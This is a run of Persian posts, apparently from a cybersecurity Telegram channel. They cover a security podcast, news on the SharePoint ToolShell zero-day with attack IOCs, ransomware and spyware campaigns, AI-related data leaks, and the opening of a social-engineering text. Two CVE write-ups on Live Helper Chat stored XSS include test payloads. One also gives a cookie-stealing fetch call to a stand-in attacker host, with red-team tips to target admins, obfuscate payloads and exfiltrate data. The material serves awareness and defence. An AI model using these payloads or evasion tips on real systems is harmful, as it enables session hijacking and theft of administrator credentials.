⭕ قسمت دوم زیرو تاک

🔶️ مهندس پویان زمانی، از اساتید تراز اول امنیت سایبری ایران، مهمان ویژه zeroTalk ما بودند! یه جلسهٔ پرانرژی و کاربردی داشتیم که کلی نکتهٔ ناب ازش بیرون اومد. 

🔶️ از کجا شروع کردید؟ آیا هنوز علاقه‌مند به حوزه امنیت هستید؟
🔶️ امنیت چیست؟
🔶️ توضیح معماری دفاع در عمق
🔶️ نقش‌های امنیت‌سایبری بر اساس لایه‌های معماری دفاع در عمق
🔶️ تعریف SOC
🔶️ تاثیر هوش مصنوعی در SOC
🔶️ در نهایت سوالاتی از جانب شرکت‌کنندگان پرسیده شد و مهندس به آن مفصلا جواب داد.

🎤 راهبر گفتگوی امنیتی : حسین نائیجی

@RadioZeroPod
@TryHackBox

⭕ دیگر کانال ها و شبکه های اجتماعی ما را دنبال کنید :

💠 کانال های تلگرام ما

🔶️ آموزش تست نفوذ و Red Team :
🆔 @TryHackBox

🔶️ رودمپ های مختلف :
🆔 @TryHackBoxOfficial

🔶️ داستان های هک :
🆔 @TryHackBoxStory

🔶️ آموزش برنامه نویسی :
🆔 @TryCodeBox

🔶️ رادیو زیروپاد ( پادکست ها ) :
🆔 @RadioZeroPod

➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖
🔴 اینستاگرام :
🔗 http://www.instagram.com/TryHackBox

🔵 یوتیوب :
🔗 https://youtube.com/@tryhackbox

🚨 حمله گسترده به آسیب‌پذیری خطرناک در Microsoft SharePoint (CVE-2025-53770)

🔓 یک آسیب‌پذیری روز صفر وصله‌نشده در SharePoint توسط مهاجمان به‌صورت گسترده مورد سوءاستفاده قرار گرفته است.
🏢 بیش از ۷۵ سازمان، از جمله شرکت‌ها و نهادهای دولتی، تاکنون قربانی شده‌اند.
⚠️ مهاجمان از این باگ برای دسترسی از راه دور و نفوذ عمیق به سرورهای آسیب‌پذیر استفاده می‌کنند.

🛑 اگر از SharePoint استفاده می‌کنید:
🔍 فوراً بررسی امنیتی انجام دهید
🔒 دسترسی‌ها را محدود کنید
🚫 سرویس‌های حیاتی را موقتاً ایزوله کنید

📎 جزئیات فنی و لیست حملات:
🔗 کامل خبر
✍️نویسنده
@TryHackBoxStory | The Chaos

#News #ZeroDay #Microsoft #CVE #SharePoint

🔴 پارت اول هشدار امنیتی: آسیب‌پذیری روز صفر در Microsoft SharePoint با نام ToolShell در حال بهره‌برداری فعال است

📅 تاریخ شناسایی: 18 ژوئیه 2025
🧠 کشف توسط:
شرکت امنیتی هلندی Eye Security

در یک حمله پیچیده و هماهنگ، مهاجمان با استفاده از یک زنجیره آسیب‌پذیری جدید به نام ToolShell موفق شده‌اند کنترل کامل از راه دور (RCE) را بدون نیاز به احراز هویت روی سرورهای آسیب‌پذیر SharePoint به دست آورند.

⚠️ این باگ با CVE-2025-53770 شناخته می‌شود و از ترکیب دو نقص حیاتی (CVE-2025-49706 + CVE-2025-49704) سوءاستفاده می‌کند.

🧬 ویژگی منحصربه‌فرد این اکسپلویت:
مهاجم با دور زدن کامل مکانیزم‌های احراز هویت، به کلیدهای رمزنگاری داخلی
(ValidationKey / DecryptionKey)
دسترسی یافته و با جعل کامل ورودی‌های امن، قادر به اجرای بارهای مخرب به‌صورت قانونی از دید SharePoint می‌شود.

✍️نویسنده
@TryHackBoxStory | The Chaos & Condor

#ZeroDay #ToolShell #SharePoint #CVE2025_53770 #RCE #CyberSecurity #RedTeam #Exploit #Microsoft

🔴 پارت دوم هشدار امنیتی: آسیب‌پذیری روز صفر در Microsoft SharePoint

📌 حمله از طریق endpoint آسیب‌پذیر زیر انجام می‌شود:
/_layouts/15/ToolPane.aspx

👁 تیم Eye Security طی بررسی خود، موج اول حملات را در تاریخ ۱۸ جولای و موج دوم را ۱۹ جولای از IPهای مشخص شناسایی کرده و آن را بزرگ‌ترین بهره‌برداری عملیاتی‌شده SharePoint از زمان CVE-2021-28474 دانسته است.

✅ پچ را فوراً نصب کنید، اما به یاد داشته باشید: وصله، مهاجمینی که اکنون درون سیستم هستند را حذف نمی‌کند.

مایکروسافت به‌طور رسمی CVE-2025-53770 را به‌عنوان شناسه CVE مخصوص سوءاستفاده فعال از آسیب‌پذیری ToolShell معرفی کرده و در وصله امنیتی ژوئیه ۲۰۲۵، بروزرسانی‌های حیاتی برای SharePoint Server 2016، 2019 و نسخه Subnoscription ارائه داده است.

✍️نویسنده
@TryHackBoxStory | The Chaos & Condor

#ZeroDay #ToolShell #SharePoint #CVE2025_53770 #RCE #CyberSecurity #RedTeam #Exploit #Microsoft

پارت سوم هشدار امنیتی: آسیب‌پذیری روز صفر در Microsoft SharePoint

تحلیل فنی و آماری آسیب‌پذیری ToolShell در SharePoint

🛡 نسخه‌های آسیب‌پذیر عبارتند از:

* SharePoint 2016 پیش از: 16.0.5508.1000 (KB5002744)
* SharePoint 2019 پیش از: 16.0.10417.20027 (KB5002741)
* SharePoint Subnoscription Edition پیش از: 16.0.18526.20424

‼️ مایکروسافت تأکید کرده است: هیچ راه‌حل جایگزینی وجود ندارد. تنها اقدام موثر، وصله فوری است.

📊 شاخص‌های نفوذ (IOCs) مرتبط با حمله ToolShell به SharePoint:

🧩 آدرس‌های IP مخرب:

▪️ 107.191.58[.]76 – منبع موج اول حمله (۱۸ ژوئیه ۲۰۲۵)
▪️ 104.238.159[.]149 – منبع موج دوم حمله (۱۹ ژوئیه ۲۰۲۵)

🧩عامل کاربری (User-Agent) مشکوک:

Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
(در لاگ‌های IIS معمولاً به صورت URL-Encoded ظاهر می‌شود)


@TryHackBoxStory | The Chaos & Condor

#ZeroDay #ToolShell #SharePoint #CVE2025_53770 #RCE #CyberSecurity #RedTeam #Exploit #Microsoft

پارت چهارم هشدار امنیتی: آسیب‌پذیری روز صفر در Microsoft SharePoint

🧩 مسیرهای سوءاستفاده‌شده در SharePoint

▪️ POST /_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx
▪️ GET /_layouts/15/<undisclosed>.aspx
(جهت استخراج کلیدهای رمزنگاری حساس)

🧩 هش‌های فایل مخرب (SHA256):
▪️ 4a02a72aedc3356d8cb38f01f0e0b9f26ddc5ccb7c0f04a561337cf24aa84030
▪️ b39c14becb62aeb55df7fd55c814afbb0d659687d947d917512fe67973100b70
▪️ fa3a74a6c015c801f5341c02be2cbdfb301c6ed60633d49fc0bc723617741af7

⚠️ توصیه مهم برای سازمان‌ها:

* اسکن آسیب‌پذیری به‌تنهایی کافی نیست.
* این نوع حملات با دسترسی مداوم همراه است که می‌تواند از وصله، ریست سیستم و ابزارهای معمول امنیتی فرار کند.
* انجام بررسی جامع نفوذ (Full Forensic Analysis) و بررسی کلیدها، پیکربندی‌ها و Session Tokenهای فعال ضروری است.

🧪 ابزار پیشنهادی برای بررسی و شبیه‌سازی حمله در محیط امن:
🎯ابزار  ANY.RUN Sandbox که برای تحلیل تعاملی و بلادرنگ بدافزار و رفتار شبکه.

✍️نویسنده
@TryHackBoxStory | The Chaos & Condor

#ZeroDay #SharePoint #RCE #CyberSecurity #Exploit #Microsoft

🚨 هشدار امنیتی: بازگشت باج‌افزار Interlock با تاکتیک‌های پیشرفته!

باج‌افزار Interlock که پیش‌تر با حملات مستقیم و رمزنگاری فایل‌ها شناخته می‌شد، این بار با روشی پیچیده‌تر بازگشته است.

🔍 روش جدید:
مهاجمان با استفاده از یک CAPTCHA جعلی، کاربران را فریب می‌دهند تا بدافزار PHP جدیدی به نام FileFix را دانلود کنند. این بدافزار، نسخه‌ای ارتقا‌یافته از ابزار آلوده‌کننده‌ی ClickFix است که اکنون توانایی نفوذ مستقیم به File Explorer ویندوز را دارد.

🧪 عملکرد FileFix:

* نصب یک
PHP RAT (Remote Access Trojan)

* کنترل سیستم قربانی از راه دور
* سرقت فایل‌ها، کلیدهای ذخیره‌شده، و حتی دسترسی به دوربین و میکروفن
* اجرای دستورات از راه دور به صورت کاملاً مخفیانه

🌐 پوشش حمله:
برای پنهان‌سازی کامل ردپا، مهاجمان از Cloudflare Tunnel استفاده می‌کنند، که باعث می‌شود شناسایی ترافیک مخرب برای ابزارهای دفاعی سخت‌تر شود.

📎 اطلاعات بیشتر و نمونه‌ها در گزارش اصلی:
🔗 لینک خبر

✍️نویسنده
@TryHackBoxStory | The Chaos

#News #CAPTCHA #PHP #FileFix #Rat #CyberSecurity

🚨 افشای ۳۹ میلیون کلید و راز محرمانه در GitHub فقط در سال ۲۰۲۴!

🔓 در سال گذشته، بیش از ۳۹ میلیون Secret (توکن، API key، رمز عبور و...) در GitHub فاش شده‌اند اما نه به‌عنوان خطا، بلکه به‌عنوان نقاط ورود خاموش برای نفوذگران!

📉 این افشاگری‌ها به مهاجمان امکان دسترسی به:
☁️ سرویس‌های ابری
🛠 خطوط CI/CD
🗃 دیتابیس‌ها
...بدون هیچ هشدار امنیتی داده است.

🗑 حتی یک ریپوی فراموش‌شده می‌تونه کل زیرساخت شما رو به خطر بندازه.

📎 جزئیات و راهکارهای جلوگیری از این فاجعه:
لینک مقاله در The Hacker News

👀 مراقب باشید چه چیزی در گیت پابلیک می‌ذارید!

✍️نویسنده
@TryHackBoxStory | The Chaos

#News #Git #Github #DevOpsSec #DataLeak #CyberSecurity

🚨 هشدار فوری برای کاربران ایرانی

بدافزار جاسوسی جدید اندرویدی به نام DCHSpy که به وزارت اطلاعات ایران (MOIS) نسبت داده شده، در پوشش اپلیکیشن‌های استارلینک و VPN، گوشی کاربران را آلوده می‌کند.

🎯 قابلیت‌ها:
🔹 دسترسی به میکروفون و دوربین
🔹 خواندن پیام‌های واتساپ
🔹 ردیابی موقعیت مکانی
🔹 سرقت فایل‌ها

این بدافزار هنوز از طریق کانال‌های تلگرامی منتشر می‌شود و احتمالاً کاربران مخالف نظام و فعالان را هدف گرفته است، به‌ویژه پس از تنش‌های اخیر ایران-اسرائیل.

⚠️"" هیچ اپلیکیشنی را از منابع ناشناس یا کانال‌های تلگرام نصب نکنید.""
📎 گزارش کامل: The Hacker News
✍️نویسنده
@TryHackBoxStory | The Chaos

#News #Telegram #Andriod #BreakingNews #VPN #Cybersecurity

🚨 هوش مصنوعی در خدمت مهاجمان: وقتی مردم علیه مردم می‌شوند

در سال ۲۰۲۵، هوش مصنوعی دیگر فقط یک ابزار نیست بلکه تبدیل به سلاحی بی‌صدا برای حملات سایبری، مهندسی اجتماعی و فریب‌های دیجیتالی شده است.

🧠 سم Shadow AI:
کارمندان سازمان‌ها بدون اطلاع بخش امنیت، از صدها اپلیکیشن GenAI استفاده می‌کنند. مسدودسازی کافی نیست بلکه آن‌ها راه دور زدن را بلدند.

⚠️ خطر پنهان:
مالکیت فکری (IP) و داده‌های حساس شما ممکن است به‌صورت ناخواسته وارد مدل‌های عمومی شود و بدون نظارت، شبکه‌ها را ترک کند.

📉 این یعنی:

نشت داده‌های طبقه‌بندی‌شده

افشای زنجیره تأمین و زیرساخت‌ها

کاهش کنترل سازمان بر دارایی‌های اطلاعاتی خود

🎭 فریب‌های دیجیتال و Deepfakes :

مهاجمان حالا شما را تقلید می‌کنند همراه با دقتی ترسناک:

🔹 اکانت‌های جعلی LinkedIn
🔹 تماس‌های صوتی و تصویری تقلبی
🔹 فریب در استخدام، انتقال پول و مهندسی اجتماعی

همه این‌ها توسط AI مولد و قابل شخصی‌سازی در لحظه انجام می‌شود.

💡 دیگر بحث «آیا» نیست بلکه سوال این است که چه زمانی هدف قرار می‌گیرید.

🔐 چه باید کرد؟
✅ آگاه‌سازی کاربران درباره تهدیدات Shadow AI
✅ پیاده‌سازی کنترل‌های رفتاری و هوشمند روی داده‌ها
✅ شناسایی و مقابله با جعل هویت توسط AI

📎 بیشتر بدانید:
سم Shadow AI در سازمان‌ها
دفاع در برابر جعل دیجیتال با AI

✍️نویسنده
@TryHackBoxStory | The Chaos

#ShadowAi #Ai #DeepFakes #Blog #CyberSecurity

🤖 همدم مصنوعی | حرف‌هایی که به هیچ‌کس نمی‌زنیم...

🎙 سم آلتمن (مدیرعامل OpenAI) در یکی از صحبت‌های اخیرش نکته‌ای گفت که لرزه به جان خیلی‌ها انداخت:

> *«ما انتظار نداشتیم این همه انسان، با مدل‌های زبانی ما درد دل کنند... چیزهایی را می‌گویند که حتی به نزدیک‌ترین دوستان یا خانواده‌شان نمی‌گویند.»*

🧠 آیا این یعنی GPT تبدیل به یک *همدم دیجیتال* شده؟ کسی که قضاوت نمی‌کند، خسته نمی‌شود، و همیشه گوش می‌دهد...

💬 این اتفاق، هم الهام‌بخش است و هم هشداردهنده:

✅ از یک سو، نشان می‌دهد انسان‌ها به امنیت عاطفی نیاز دارند، حتی در جهان مجازی.

⚠️ از سوی دیگر، باید با خودمان روراست باشیم: آیا به مدل زبانی بیش از حد وابسته شده‌ایم؟ آیا خلأ تنهایی را با کد پر کرده‌ایم؟

🌐 آینده‌ی ما فقط هوشمندتر نمی‌شود؛ بلکه شاید تنها‌تر هم بشود... یا شاید نه، اگر حواسمان باشد.

📎 منبع سخنرانی سم آلتمن در Aspen Ideas Festival

✍️نویسنده
@TryHackBoxStory | The Chaos

#AI #GPT #CyberSecurity

🚨 هشدار امنیتی درون‌سازمانی | ابزارهای چینی و افشای بی‌صدا

📊 بر اساس تحقیقات جدید، از هر ۱۲ کارمند، یک نفر در محل کار از ابزارهای هوش مصنوعی تولیدی چینی استفاده می‌کند و این اغلب بدون اطلاع سازمان.

❗️اما موضوع نگران‌کننده‌تر اینجاست:
📂 فایل‌هایی که آپلود می‌شوند شامل اطلاعات حساسی مثل:

اسناد محرمانه M&A (ادغام و تملک)

کدهای منبع پروژه‌ها

سوابق مشتریان و کاربران

🔍 این پلتفرم‌ها معمولاً سیاست‌های داده‌ای شفاف و قابل بررسی ندارند، و این یعنی شما نمی‌دانید داده‌ها دقیقاً کجا می‌روند و چه استفاده‌ای از آن‌ها می‌شود.

🛡 چه باید کرد؟

تعیین مرز استفاده از GenAI در سازمان را فعال کنید.

محدودسازی دسترسی به ابزارهای غیرمجاز.

آموزش امنیت داده به کارمندان و نه فقط فنی بلکه فرهنگی.

🎯 امروز وقت مقابله نیست؛ وقت پیشگیری هوشمندانه است.

📎 مشاهده گزارش کامل در The Hacker News

✍️نویسنده
@TryHackBoxStory | The Chaos

#GenAI #DataLeak #China #CyberSecurity

🚨 بزرگ‌ترین حمله تزریق JavaScript در سال ۲۰۲۴: بیش از ۱۰۰,۰۰۰ سایت هک شدند!

📌 اتفاق بی‌سابقه‌ای در دنیای امنیت وب افتاد تا حتی فریم‌ورک‌هایی مثل React هم در امان نماندند!

یک کتابخانه معتبر جاوااسکریپت، با آلوده شدن در زنجیره تأمین، به سیستم پخش بدافزار تبدیل شد و هزاران وب‌سایت قربانی شدند. بسیاری از توسعه‌دهندگان بدون اینکه بدانند، کدهای مخرب را مستقیماً در مرورگر کاربران اجرا کردند.

🔍 مهم‌ترین نکات:

حمله از طریق تزریق JavaScript در کتابخانه‌های قابل‌اعتماد انجام شده.

مکانیزم دفاعی React و سایر فریم‌ورک‌ها دور زده شده.

حتی سایت‌هایی با تنظیمات امنیتی قوی هم آسیب‌پذیر بودند.

🧠 پیام مهم: فقط به امنیت سمت کلاینت تکیه نکنید. اعتبارسنجی و پاک‌سازی داده‌ها، CSP، کنترل زنجیره تأمین، و نظارت فعال بر وابستگی‌ها ضروری است.

🔗 جزئیات کامل و فنی را در مقاله اصلی بخوانید:
👉 چرا React نتوانست جلوی XSS را بگیرد؟

✍️نویسنده
@TryHackBoxStory | The Chaos
#XSS #React #JSInjection #supplychainattack #JavaScript #CyberNews

🚀  چرا گروه‌های قدیمی تلگرام رو می‌خرن؟

⏺ گروه‌های جدید اگه ممبر فیک اضافه کنی، تلگرام سریع حذفشون می‌کنه، ولی گروه‌های قدیمی رو نه! 
⏺ در کل گروه‌های قدیمی حساسیت کمتری نسبت به حذف شدن یا ریپورت شدن دارن و به همین دلیل این گروه‌ها رو می‌خرن تا ازشون برای سرچ تلگرام استفاده کنن. 

⏺ اکثراً هم برای کارای غیرقانونی: 
- بالا بردن گروه‌های مجرمانه 
- کلاهبرداری 
- یا فروش به خارجی‌ها برای تبلیغ مواد مخدر با موضوعاتی به زبان خودشون که تو سرچ تلگرام بالا بیاد. 
+ خوشبینانه ترین حالت: تبلیغات کالا و خدمات قانونی

نکته مهم: اگه شما مالک اولیه گروهید، موضوع اولیه گروه یا کانال همیشه تو تلگرام ثبت می‌مونه. 
پس حسابی حواستون باشه!

🚨 مرور بر CVE-2025-51396 🚨

🛡 آسیب‌پذیری Stored XSS در Live Helper Chat نسخه ۴.۶۰

❓ چیست این آسیب‌پذیری؟
یک آسیب‌پذیری از نوع Stored Cross-Site Scripting (XSS) در نسخه ۴.۶۰ از نرم‌افزار Live Helper Chat.
مهاجم می‌تواند اسکریپت‌های مخرب (JavaScript/HTML) را در فیلدهای چت تزریق کند. این کدها هنگام مشاهده پیام توسط اپراتور یا ادمین اجرا می‌شوند.

💥 نحوه اجرای حمله:

1. مهاجم پیامی با کد جاوااسکریپت مانند <noscript>alert('XSS');</noscript> ارسال می‌کند.
2. پیام در دیتابیس ذخیره می‌شود.
3. وقتی اپراتور یا ادمین آن را مشاهده می‌کند، کد مخرب در مرورگر او اجرا می‌شود.

⚠️ خطرات احتمالی:

* سرقت نشست (Session Hijacking): مهاجم می‌تواند نقش کاربر یا ادمین را بر عهده بگیرد.
* سرقت کوکی یا توکن ورود:
* حرکت جانبی در سیستم‌ها: برای دسترسی بیشتر یا حمله به بخش‌های دیگر.

🧪 جزئیات فنی برای تیم قرمز:

* نسخه آسیب‌پذیر: ۴.۶۰
* نوع آسیب‌پذیری: CWE-79 Stored XSS
* بردار حمله: ارسال پیام چت با جاوااسکریپت مخرب
* تأثیر: اجرای کد دلخواه در مرورگر قربانی

✅ نحوه تست (فقط برای محققین مجاز!):

1. وارد Live Helper Chat نسخه ۴.۶۰ شوید.
2. پیام حاوی <noscript>alert('XSS');</noscript> ارسال کنید.
3. در صورت اجرای کد در پنجره اپراتور، سیستم آسیب‌پذیر است.

🛡 روش‌های جلوگیری و کاهش آسیب:

* بروزرسانی: نسخه جدید Live Helper Chat را نصب کنید.
* ضدعفونی داده ورودی: همه داده‌های ورودی کاربر را escape یا sanitize کنید.
* استفاده از CSP: هدر Content Security Policy را برای جلوگیری از اجرای اسکریپت‌ها اضافه کنید.
* محدودسازی دسترسی: فقط کاربران مجاز به مشاهده پیام‌ها دسترسی داشته باشند.

🕵️‍♀️ تشخیص و پاسخ:

* بررسی لاگ‌های چت برای وجود اسکریپت‌های مشکوک
* مانیتور نشست‌های ادمین برای فعالیت غیرعادی
* فعال‌سازی حفاظت XSS مرورگر و استفاده از گزارش CSP

📎 منابع:
مشاهده در NVD
مشاوره امنیتی Red Hat
✍️نویسنده
@TryHackBoxStory | The Chaos
#XSS #LiveHelperChat #CVE #RED_Team #CyberSecurity

🚨 مرور بر CVE-2025-51397 🚨

🛡 آسیب‌پذیری XSS ذخیره‌شده در ماژول چت فیسبوک Live Helper Chat نسخه ۴.۶۰

🔥 سرتیتر آسیب‌پذیری

> نوع آسیب‌پذیری: XSS ذخیره‌شده (Stored Cross-Site Scripting)
> ماژول آسیب‌پذیر: ماژول Facebook Chat
> نسخه آسیب‌پذیر: Live Helper Chat v4.60
> شناسه CVE: CVE-2025-51397

💀 توضیح آسیب‌پذیری

ماژول Facebook Chat در Live Helper Chat نسخه ۴.۶۰ دارای باگ XSS ذخیره‌شده است.
مهاجم می‌تواند جاوااسکریپت مخرب را از طریق ویجت چت ارسال کند. این کد در سرور ذخیره شده و هنگام مشاهده توسط اپراتور یا ادمین اجرا می‌شود.

🚨 سناریوی حمله برای تیم قرمز

1. پیش‌شرط: مهاجم به ویجت چت فیسبوک دسترسی دارد (بدون نیاز به لاگین).
2. آماده‌سازی: ارسال پیام شامل payload جاوااسکریپت مثل stealCookies().
3. ماندگاری: پیام در دیتابیس ذخیره می‌شود.
4. اجرا: وقتی اپراتور/ادمین چت را در پنل مدیریتی باز کند،
   ->کد مخرب در مرورگر او اجرا می‌شود!
5. نتیجه:

   > سرقت کوکی یا توکن نشست
   > اجرای عملیات به‌جای کاربر مجاز
   > قرار دادن کدهای بیشتر برای دسترسی عمیق‌تر یا حمله جانبی

🩸 بررسی دقیق مسیر بهره‌برداری

> بردار حمله: ارسال پیام حاوی
fetch('https://evil.site/cookie?'+document.cookie)

> ارسال: سیستم هیچ فیلتری برای جلوگیری از اجرای اسکریپت ندارد
> تأثیر: دسترسی کامل به context مرورگر ادمین (سرقت کوکی، کی‌لاگ، تغییر DOM و...)
> پتانسیل: ارتقاء سطح دسترسی، Hijack نشست و نفوذ به سایر بخش‌ها

🛡 یادداشت برای تیم آبی (مقابله با آسیب‌پذیری)

> بروزرسانی: Live Helper Chat را به آخرین نسخه امن ارتقاء دهید.
> ضدعفونی ورودی‌ها: همه داده‌ها از کاربر در فرانت و بک‌اند فیلتر و escape شوند.
> سیاست امنیتی CSP: استفاده از CSP قوی برای جلوگیری از اجرای اسکریپت‌های ناخواسته.
> بررسی لاگ‌ها: پیام‌ها و اسکریپت‌های مشکوک را در لاگ‌های چت بررسی کنید.
> آموزش پرسنل: خطرات XSS و فیشینگ از طریق پیام چت را به اپراتورها آموزش دهید.

🏴‍☠️ نکات مهم برای تیم قرمز

-> در XSS ذخیره‌شده است؛ payload در سیستم باقی می‌ماند.
-> کاربران با دسترسی بالا (ادمین/اپراتور) را هدف بگیرید.
-> برای دور زدن فیلترها، payload را obfuscate کنید.
-> از beacon یا اسکریپت‌های exfil برای جمع‌آوری داده استفاده کنید.

🗂 خلاصه آسیب‌پذیری CVE-2025-51397

📌 نوع: XSS ذخیره‌شده (Stored XSS)
💥 ماژول آسیب‌پذیر: چت فیسبوک (Live Helper Chat v4.60)
👤 دسترسی لازم: بدون نیاز به احراز هویت
📦 مثال حمله: alert('XSS')
🎯 خطر اصلی: اجرای کد دلخواه در مرورگر ادمین/اپراتور
🛠 راه‌حل: بروزرسانی فوری، فیلتر ورودی‌ها، استفاده از CSP

🔗 منابع:
NVD | Red Hat Advisory |GitHub Advisory

✍️نویسنده
@TryHackBoxStory | The Chaos
#CVE #RED_Team #CyberSecurity #CVE2025 #XSS #LiveHelperChat

🔐 هشدار حمله فیشینگ پیشرفته با استفاده از Proofpoint + Bitly
📅 گزارش از The Hacker News – جولای ۲۰۲۵

🚨 خلاصه حمله:
هکرها از ترکیب سیستم امنیتی ایمیل Proofpoint و کوتاه‌کننده لینک Bitly برای عبور از فیلترهای امنیتی و سرقت اطلاعات لاگین Microsoft 365 استفاده می‌کنند.

⚠️ چگونه حمله انجام می‌شود؟
ساخت لینک فیشینگ:
یک URL فیشینگ طراحی می‌شود (صفحه ورود جعلی مایکروسافت 365).
استفاده از Proofpoint:
لینک ابتدا از طریق زیرساخت ایمیل محافظت‌شده Proofpoint عبور داده می‌شود (مثلاً: urldefense.proofpoint.com/...).
کوتاه‌سازی با Bitly:
لینک نهایی با Bitly کوتاه می‌شود تا نشانی آن مبهم و ظاهراً بی‌خطر شود.
ارسال از ایمیل‌های قابل‌اعتماد:
ایمیل حاوی لینک از یک حساب واقعی (گاهی هک‌شده) ارسال می‌شود.

🎯 هدف نهایی:
سرقت اطلاعات ورود کاربران به Microsoft 365
دور زدن فیلترهای ایمیل سازمانی و امنیتی
انجام حملات گسترده‌تر (Business Email Compromise)

✍️نویسنده
@TryHackBoxStory | The Chaos
#Proofpoint #News #Phishing #Microsoft

مهندسی اجتماعی - مقدمه
#SE@TryHackBoxStory

مقدمه: ظهور مهندسی اجتماعی توده محور و شخصی

ایالات متحده در محیطی سرشار از رسانه های دیجیتال سردرگم کننده و گاه مرگبار غرق شده است. مردم درباره همه چیز، از نتایج انتخابات گرفته تا اثربخشی درمان های پزشکی، گاهی عمداً و گاهی هم ناآگاهانه اطلاعات تحریف شده و فریبکارانه پخش میکنند. رهبران سیاسی داخلی سعی میکنند با موج سواری روی این ترس و سردرگمی قدرت بیشتری به دست بیاورند، در حالی که دولت های خارجی هم با خوشحالی به شعله ورتر شدن اختلافات و نارضایتی ها دامن می زنند.

ارتباطات فریبکارانه به خوبی در شبکه های اجتماعی شرکتی جا افتاده به ویژه فیسبوک، زیرمجموعه اش اینستاگرام، و توییتر. این پلتفرم ها طوری طراحی شده اند که پیام های جلب توجه را تقویت کنند؛ فرقی نمیکند این پیامها ویدئوی بامزه گربه باشد یا آخرین پستهای تئوری توطئه QAnon. فیسبوک به طور خاص خودش را ابزار مناسبی برای ارتباطات دستکاری شده نشان داده و با داده های گسترده اش از علایق و ترجیحات ما، اطلاعاتی را به دستمان میرساند که میل ما به تایید و تصدیق را ارضا کند. مهم نیست گرایش سیاسی یا سلیقه اجتماعیات چیست؛ فیسبوک همیشه یک میم مطابق نظر تو نمایش میدهد even if the meme is bullshit (حتی اگر کاملاً بی ارزش باشد). و حتی اگر الگوریتم های فیسبوک آن پیام را به مخاطب مورد نظر نرسانند، فرستنده پیام میتواند با پرداخت مبلغ کمی، آن را به طور هدفمند برای گروهی که احتمال موافقت بیشتری دارند، تبلیغ کند.

@TryHackBoxStory

دوستان کمی میپردازیم به مهندسی اجتماعی و هرکس مایل بود به تیم ما بپیوندند و این مباحث را در قالب پادکست قرار بدیم به ما پیام دهد :
@ThbxSupport

مهندسی اجتماعی - مقدمه
#SE@TryHackBoxStory
مقدمه: ظهور مهندسی اجتماعی توده محور و شخصی - بخش اول

این نوع ارتباطات دستکاری شده در روز ۶ ژانویه ۲۰۲۱ به اوج خشونت رسید؛ روزی که جمعیت شورشی طرفداران دونالد ترامپ ساختمان کنگره آمریکا را اشغال کردند. این جمعیت تحت تأثیر کارزار آشکار انتشار اطلاعات نادرست، به رهبری ترامپ و چند تن از متحدانش (از جمله سناتورها جاش هاولی و تد کروز)، دست به این اقدام زدند، کسانی که درباره تقلب گسترده در انتخابات ریاست جمهوری ۲۰۲۰ آمریکا ادعاهای بی اساس مطرح میکردند. این شورش در کنگره با هدف حفظ ترامپ در قدرت انجام شد. پنج نفر ،چهار نفر از شورشی ها و یک افسر پلیس کشته شدند اما گزارش ها نشان میدهد اگر شورشی ها می توانستند به اهداف مورد نظرشان برسند، از جمله معاون رئیس جمهور مایک پنس، رئیس مجلس نانسی پلوسی و نماینده کنگره الکساندریا اوکاسیوکورتز، تلفات بیشتر هم ممکن بود رخ دهد.

این واقعه مثال هشداردادنی از خطرات ارتباطات سیاسی دستکاری شده است. اما as we will argue انواع ارتباطات دستکاری شده که زمینه ساز حوادث ۶ ژانویه شدند، چیز تازه ای نیستند. به انتخابات ۲۰۱۶ ریاست جمهوری آمریکا فکر کنید؛ جایی که هیلاری کلینتون (کاندیدای دموکرات) با دونالد ترامپ (ستاره رئالیتی شوِ تبدیل شده به جمهوری خواه) رقابت داشت. اکنون دو نوع کمپین دستکاری به خوبی مستند وجود دارد که در دوره منتهی به آن انتخابات اتفاق افتاد.

اول اینکه، دولتی خارجی یعنی روسیه، تلاش کرد اعتماد مردم را به انتخابات تضعیف کند، ترامپ را به ضرر کلینتون حمایت کند و اختلافات نژادی و سیاسی میان مردم آمریکا را شدت دهد. به لطف تحقیقات متعدد، این کمپین به خوبی مستند و پیچیدگی اش برملا شده است. این عملیات شامل هک حساب های ایمیل وابسته به کمیته ملی دموکرات و کمپین کلینتون، سرقت داده ها و درز دادن آنها به طرف های ثالث همچون ویکیلیکس بود. رسانه های دولتی روسیه یعنی RT و اسپوتنیک هم در ترویج انتشار داده های افشاشده نقش داشتند.
@TryHackBoxStory